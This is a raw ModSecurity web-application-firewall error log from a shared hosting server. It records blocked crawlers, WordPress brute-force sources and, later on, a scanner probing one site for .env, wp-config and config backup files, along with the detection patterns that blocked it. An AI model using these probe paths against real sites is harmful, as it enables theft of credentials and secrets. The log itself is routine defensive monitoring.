[Tue May 26 14:13:03.601369 2026] [security2:error] [pid 598542:tid 598572] [remote 172.104.164.56:34186] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 56.164.104.172.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahVdF_4iWyZxnXeAW3I4YwAAPh0"]
[Tue May 26 14:13:04.413192 2026] [security2:error] [pid 598542:tid 598791] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdF_4iWyZxnXeAW3I4bwAAAHc"]
[Tue May 26 14:13:06.422395 2026] [security2:error] [pid 598542:tid 598722] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdGv4iWyZxnXeAW3I4pQAAADI"]
[Tue May 26 14:13:08.023527 2026] [security2:error] [pid 598542:tid 598788] [client 89.221.206.81:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVdG_4iWyZxnXeAW3I47gAAAHQ"], referer: https://www.anujtradingco.com/
[Tue May 26 14:13:08.616849 2026] [security2:error] [pid 598542:tid 598778] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdHP4iWyZxnXeAW3I49gAAAGo"]
[Tue May 26 14:13:09.271387 2026] [security2:error] [pid 598542:tid 598742] [client 89.221.206.81:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVdHf4iWyZxnXeAW3I5EwAAAEY"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1430896&moderation-hash=683babac959ef6b0812e0407a9e1141b
[Tue May 26 14:13:12.053599 2026] [security2:error] [pid 598542:tid 598774] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdH_4iWyZxnXeAW3I5dgAAAGY"]
[Tue May 26 14:13:13.154580 2026] [security2:error] [pid 598542:tid 598685] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdIP4iWyZxnXeAW3I5sQAAAA0"]
[Tue May 26 14:13:13.443579 2026] [security2:error] [pid 598542:tid 598732] [client 89.221.206.81:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVdIf4iWyZxnXeAW3I5wAAAADw"], referer: https://anujtradingco.com
[Tue May 26 14:13:14.071770 2026] [security2:error] [pid 598542:tid 598751] [client 202.141.30.10:35469] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVdIv4iWyZxnXeAW3I51wAAAE8"]
[Tue May 26 14:13:14.071887 2026] [security2:error] [pid 598542:tid 598751] [client 202.141.30.10:35469] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVdIv4iWyZxnXeAW3I51wAAAE8"]
[Tue May 26 14:13:14.392524 2026] [security2:error] [pid 598542:tid 598769] [client 113.188.213.212:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdIf4iWyZxnXeAW3I50gAAAGE"]
[Tue May 26 14:13:15.232885 2026] [security2:error] [pid 598542:tid 598688] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdIv4iWyZxnXeAW3I57gAAABA"]
[Tue May 26 14:13:17.594284 2026] [security2:error] [pid 598542:tid 598677] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdJf4iWyZxnXeAW3I6MQAAAAU"]
[Tue May 26 14:13:18.679423 2026] [security2:error] [pid 598542:tid 598702] [client 114.119.149.90:45961] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.ameritradeng.com"] [uri "/"] [unique_id "ahVdJv4iWyZxnXeAW3I6WAAAAB4"], referer: http://www.ameritradeng.com/
[Tue May 26 14:13:18.749076 2026] [ssl:error] [pid 598542:tid 598700] [client 3.233.59.216:29353] AH02032: Hostname md-74.webhostbox.net (default host as no SNI was provided) and hostname cpcalendars.masonicarkfoundation.in.svijaykumar.in provided via HTTP have no compatible SSL setup for policy 'secure'
[Tue May 26 14:13:19.589317 2026] [ssl:error] [pid 598542:tid 598701] [client 54.86.115.253:21031] AH02032: Hostname md-74.webhostbox.net (default host as no SNI was provided) and hostname cpcontacts.dezkapro.com provided via HTTP have no compatible SSL setup for policy 'secure'
[Tue May 26 14:13:20.257297 2026] [security2:error] [pid 598542:tid 598722] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdJ_4iWyZxnXeAW3I6fwAAADI"]
[Tue May 26 14:13:21.279573 2026] [security2:error] [pid 598542:tid 598712] [client 169.224.1.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVdJv4iWyZxnXeAW3I6YQAAACg"]
[Tue May 26 14:13:21.936992 2026] [security2:error] [pid 598542:tid 598735] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdKf4iWyZxnXeAW3I6wQAAAD8"]
[Tue May 26 14:13:22.770108 2026] [security2:error] [pid 598542:tid 598738] [client 23.229.29.76:35419] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahVdKv4iWyZxnXeAW3I6ywAAAEI"], referer: https://www.cagmedya.com/web-tasarim-projelerinde-etkili-proje-yonetimi/
[Tue May 26 14:13:24.834844 2026] [security2:error] [pid 598542:tid 598697] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdLP4iWyZxnXeAW3I7CAAAABk"]
[Tue May 26 14:13:25.451124 2026] [security2:error] [pid 598542:tid 598738] [client 202.141.30.10:35552] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVdLf4iWyZxnXeAW3I7GwAAAEI"]
[Tue May 26 14:13:25.451244 2026] [security2:error] [pid 598542:tid 598738] [client 202.141.30.10:35552] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVdLf4iWyZxnXeAW3I7GwAAAEI"]
[Tue May 26 14:13:25.857045 2026] [security2:error] [pid 598542:tid 598769] [client 35.213.179.237:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "theafterglow-centre.com"] [uri "/index.php"] [unique_id "ahVdLf4iWyZxnXeAW3I7HgAAABw"]
[Tue May 26 14:13:26.338897 2026] [security2:error] [pid 598542:tid 598724] [client 222.189.173.235:1452] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "panda-eco.com"] [uri "/robots.txt"] [unique_id "ahVdLv4iWyZxnXeAW3I7NQAAADQ"]
[Tue May 26 14:13:26.339013 2026] [security2:error] [pid 598542:tid 598724] [client 222.189.173.235:1452] ModSecurity: Warning. Matched phrase "Sogou web spider" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "panda-eco.com"] [uri "/robots.txt"] [unique_id "ahVdLv4iWyZxnXeAW3I7NQAAADQ"]
[Tue May 26 14:13:26.948315 2026] [security2:error] [pid 598542:tid 598677] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdLv4iWyZxnXeAW3I7QgAAAAU"]
[Tue May 26 14:13:27.301943 2026] [security2:error] [pid 598542:tid 598675] [client 185.251.19.115:37785] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "ktmadvance-senegal.com"] [uri "/wp-login.php"] [unique_id "ahVdLv4iWyZxnXeAW3I7RwAAAAM"]
[Tue May 26 14:13:28.256294 2026] [security2:error] [pid 598542:tid 598679] [client 35.213.179.237:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.theafterglow-centre.com"] [uri "/index.php"] [unique_id "ahVdMP4iWyZxnXeAW3I7agAAAAc"]
[Tue May 26 14:13:29.247308 2026] [security2:error] [pid 598542:tid 598792] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdMP4iWyZxnXeAW3I7fAAAAHg"]
[Tue May 26 14:13:29.569443 2026] [security2:error] [pid 598542:tid 598742] [client 77.68.9.24:50894] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 24.9.68.77.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rehobothindependentcare.com"] [uri "/images/images/cache.php"] [unique_id "ahVdMf4iWyZxnXeAW3I7jAAAAEY"], referer: www.google.com
[Tue May 26 14:13:31.229680 2026] [security2:error] [pid 598542:tid 598788] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdMv4iWyZxnXeAW3I7tgAAAHQ"]
[Tue May 26 14:13:31.918423 2026] [security2:error] [pid 598542:tid 598743] [client 77.68.9.24:57952] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 24.9.68.77.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rehobothindependentcare.com"] [uri "/images/images/cache.php"] [unique_id "ahVdM_4iWyZxnXeAW3I7zwAAAEc"], referer: www.google.com
[Tue May 26 14:13:33.900293 2026] [security2:error] [pid 598542:tid 598729] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdNf4iWyZxnXeAW3I79gAAADk"]
[Tue May 26 14:13:35.105063 2026] [security2:error] [pid 598542:tid 598745] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdNv4iWyZxnXeAW3I8FwAAAEk"]
[Tue May 26 14:13:35.203102 2026] [security2:error] [pid 598542:tid 598773] [client 114.119.158.251:63367] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.onesoft.in"] [uri "/robots.txt"] [unique_id "ahVdN_4iWyZxnXeAW3I8KQAAAGU"]
[Tue May 26 14:13:36.217950 2026] [security2:error] [pid 598542:tid 598775] [client 202.141.30.10:35361] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVdOP4iWyZxnXeAW3I8QAAAAGc"]
[Tue May 26 14:13:36.218089 2026] [security2:error] [pid 598542:tid 598775] [client 202.141.30.10:35361] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVdOP4iWyZxnXeAW3I8QAAAAGc"]
[Tue May 26 14:13:36.989266 2026] [security2:error] [pid 598542:tid 598686] [client 75.108.148.190:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdOP4iWyZxnXeAW3I8TAAAAA4"]
[Tue May 26 14:13:38.206057 2026] [security2:error] [pid 598542:tid 598689] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdOf4iWyZxnXeAW3I8bgAAABE"]
[Tue May 26 14:13:40.170595 2026] [security2:error] [pid 598542:tid 598693] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdO_4iWyZxnXeAW3I8nQAAABU"]
[Tue May 26 14:13:40.989103 2026] [security2:error] [pid 598542:tid 598702] [client 45.148.10.62:33256] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.pronumbers.com.au"] [uri "/.env"] [unique_id "ahVdPP4iWyZxnXeAW3I8wQAAAB4"]
[Tue May 26 14:13:41.118965 2026] [security2:error] [pid 598542:tid 598774] [client 45.148.10.62:33256] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "mail.pronumbers.com.au"] [uri "/.env.bak"] [unique_id "ahVdPf4iWyZxnXeAW3I8ygAAAGY"]
[Tue May 26 14:13:41.518562 2026] [security2:error] [pid 598542:tid 598762] [client 45.148.10.62:33256] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.pronumbers.com.au"] [uri "/backend/.env"] [unique_id "ahVdPf4iWyZxnXeAW3I82gAAAFo"]
[Tue May 26 14:13:41.659254 2026] [security2:error] [pid 598542:tid 598794] [client 45.148.10.62:33256] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.pronumbers.com.au"] [uri "/test.php"] [unique_id "ahVdPf4iWyZxnXeAW3I84gAAAHo"]
[Tue May 26 14:13:42.461649 2026] [security2:error] [pid 598542:tid 598775] [client 45.148.10.62:33262] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "mail.pronumbers.com.au"] [uri "/.env.backup"] [unique_id "ahVdPv4iWyZxnXeAW3I8-gAAAGc"]
[Tue May 26 14:13:42.481071 2026] [security2:error] [pid 598542:tid 598730] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdPv4iWyZxnXeAW3I87QAAADo"]
[Tue May 26 14:13:42.590419 2026] [security2:error] [pid 598542:tid 598790] [client 45.148.10.62:33262] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "mail.pronumbers.com.au"] [uri "/.env.orig"] [unique_id "ahVdPv4iWyZxnXeAW3I8_QAAAHY"]
[Tue May 26 14:13:42.718312 2026] [security2:error] [pid 598542:tid 598713] [client 45.148.10.62:33262] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "mail.pronumbers.com.au"] [uri "/.env.old"] [unique_id "ahVdPv4iWyZxnXeAW3I9BgAAACk"]
[Tue May 26 14:13:42.987123 2026] [security2:error] [pid 598542:tid 598718] [client 45.148.10.62:33262] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.pronumbers.com.au"] [uri "/.env.php.bak"] [unique_id "ahVdPv4iWyZxnXeAW3I9CwAAAC4"]
[Tue May 26 14:13:43.382212 2026] [security2:error] [pid 598542:tid 598782] [client 45.148.10.62:33270] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.pronumbers.com.au"] [uri "/.env.php"] [unique_id "ahVdP_4iWyZxnXeAW3I9FQAAAG4"]
[Tue May 26 14:13:44.203990 2026] [security2:error] [pid 598542:tid 598687] [client 114.119.139.251:55261] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/2/"] [unique_id "ahVdQP4iWyZxnXeAW3I9PwAAAA8"], referer: https://theafterglow-centre.com/events/list/?tribe-bar-date=2023-11-20&eventDisplay=past
[Tue May 26 14:13:44.606321 2026] [security2:error] [pid 598542:tid 598680] [client 45.148.10.62:33286] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.pronumbers.com.au"] [uri "/wp-config.php"] [unique_id "ahVdQP4iWyZxnXeAW3I9UQAAAAg"]
[Tue May 26 14:13:44.706882 2026] [security2:error] [pid 598542:tid 598786] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdQP4iWyZxnXeAW3I9RQAAAHI"]
[Tue May 26 14:13:45.088256 2026] [security2:error] [pid 598542:tid 598732] [client 45.148.10.62:33294] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "mail.pronumbers.com.au"] [uri "/wp-config.php.old"] [unique_id "ahVdQf4iWyZxnXeAW3I9YQAAADw"]
[Tue May 26 14:13:45.531552 2026] [security2:error] [pid 598542:tid 598734] [client 45.148.10.62:33304] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.pronumbers.com.au"] [uri "/config.php"] [unique_id "ahVdQf4iWyZxnXeAW3I9cAAAAD4"]
[Tue May 26 14:13:45.928912 2026] [security2:error] [pid 598542:tid 598713] [client 45.148.10.62:33310] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.pronumbers.com.au"] [uri "/config.php.bak"] [unique_id "ahVdQf4iWyZxnXeAW3I9egAAACk"]
[Tue May 26 14:13:46.712510 2026] [security2:error] [pid 598542:tid 598758] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdQv4iWyZxnXeAW3I9ggAAAFY"]
[Tue May 26 14:13:46.715411 2026] [security2:error] [pid 598542:tid 598746] [client 45.148.10.62:33314] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.pronumbers.com.au"] [uri "/phpinfo.php"] [unique_id "ahVdQv4iWyZxnXeAW3I9lgAAAEo"]
[Tue May 26 14:13:47.310434 2026] [security2:error] [pid 598542:tid 598774] [client 202.141.30.10:65459] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVdQ_4iWyZxnXeAW3I9pAAAAGY"]
